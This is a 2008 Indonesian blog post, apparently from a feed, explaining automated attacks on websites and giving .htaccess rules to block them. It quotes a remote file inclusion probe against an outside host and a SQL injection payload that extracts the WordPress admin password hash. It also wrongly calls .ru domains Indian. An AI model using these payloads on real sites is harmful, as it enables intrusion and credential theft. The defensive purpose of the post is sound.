SuccessKid.com ;-) » cracker http://www.successkid.com The Right Place for Software - Ebook - Blog Mon, 19 Jul 2010 05:35:24 +0000 en hourly 1 http://wordpress.org/?v=3.0 Tips Menangkal Zombie Attack (md5(“just_a_test”)) http://www.successkid.com/tips-menangkal-zombie-attack http://www.successkid.com/tips-menangkal-zombie-attack#comments Thu, 07 Aug 2008 04:53:34 +0000 harris http://www.successkid.com/?p=58 zombie attackBagi anda yang memiliki website ataupun blog saat ini cukup marak serangan Zombie Attack yang dilakukan oleh black hacker kepada situs-situs yang dicurigai rentan terhadap serangan http dan SQL injection attack. Serangan ini dilakukan secara kontinu oleh komputer zombie yang telah di set oleh black hacker. Jika dilihat di log server anda, maka biasanya akan ditemukan URL seperti berikut ini :

GET/page.php?x=http%3A%2F%2Fwww.vlopezalvarez.com%2FPersonal%2FFotos%2FViajes%2Fxaj%2Fupahebu%2

URL diatas akan merujuk pada http://www.vlopezalvarez.com/Personal/Fotos/Viajes/xaj/upahebu/ dimana isi dari halaman tersebut adalah :

<?php echo md5(“just_a_test”);?>

URL diatas adalah salah satu saja. Masih banyak lagi serangan yang dilakukan dari URL lainnya. Paling banyak biasanya dari domain yang berekstensi .ru (india). Jadi silahkan cek log anda untuk memastikan ada tidaknya serangan itu. Serangan diatas adalah permulaan saja, jika berhasil maka nantinya akan di inject script jahat ke server anda untuk kemudian website anda “diperkosa”. Nah…  “Bagusnya” lagi adalah serangan tersebut dilakukan dari IP address yang berbeda-beda. Sehingga jika anda memutuskan melakukan BLOK IP address tampaknya tidak akan menghentikan serangan tersebut.

Dan serangan yang dilakukan pun tidak hanya berupa http injection saja tapi juga SQL injection yang akan mengeksploitasi database anda termasuk pada aplikasi blog wordpress. Contoh bentuk serangan kepada script wordpress :

GET /stuff/index.php?cat=999 UNION SELECT null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null FROM wp_users where id=1

Serangan SQL diatas berupaya mendapatkan password hash admin wordpress anda yang kemudian dicocokan dengan metode rainbow table. Jika passwordnya mudah maka bisa jebol dengan cepat.

SOLUSI

Solusi yang bisa anda lakukan adalah dengan memblok semua akses http dan SQL injection melalui file .htaccess. Jadi sebaiknya anda segera masukan kode dibawah ini tanpa harus menunggu diserang terlebih dahulu. Isilah file .htaccess anda yang terletak di root direktori dengan script sebagai berikut :

RewriteEngine On
RewriteBase /
RewriteCond %{QUERY_STRING} union [NC]
RewriteRule .* /————http———– [F,NC]
RewriteRule http: /———http———– [F,NC]
RewriteCond %{QUERY_STRING} select [NC]
RewriteRule .* /————http———– [F,NC]
RewriteRule http: /———http———– [F,NC]
RewriteCond %{QUERY_STRING} jatest [NC]
RewriteRule .* /————http———– [F,NC]
RewriteRule http: /———http———– [F,NC]
RewriteCond %{QUERY_STRING} http [NC]
RewriteRule .* /————http———– [F,NC]
RewriteRule http: /———http———– [F,NC]
RewriteCond %{QUERY_STRING} outfile [NC]
RewriteRule .* /————http———– [F,NC]
RewriteRule http: /———http———– [F,NC]

Script .htaccess diatas diperuntukan untuk website yang rentan terhadap http dan SQL injection. Tapi khusus untuk pengguna wordpress securitynya cukup baik untuk menangkal http attack. Namun untuk SQL attack masih perlu ditambah script diatas dengan menghapus baris berikut agar tidak mengganggu  halaman administrasi wordpress :

RewriteCond %{QUERY_STRING} http [NC]
RewriteRule .* /————http———– [F,NC]
RewriteRule http: /———http———– [F,NC]

Semoga berguna!

Incoming search terms for the article:

]]> http://www.successkid.com/tips-menangkal-zombie-attack/feed 1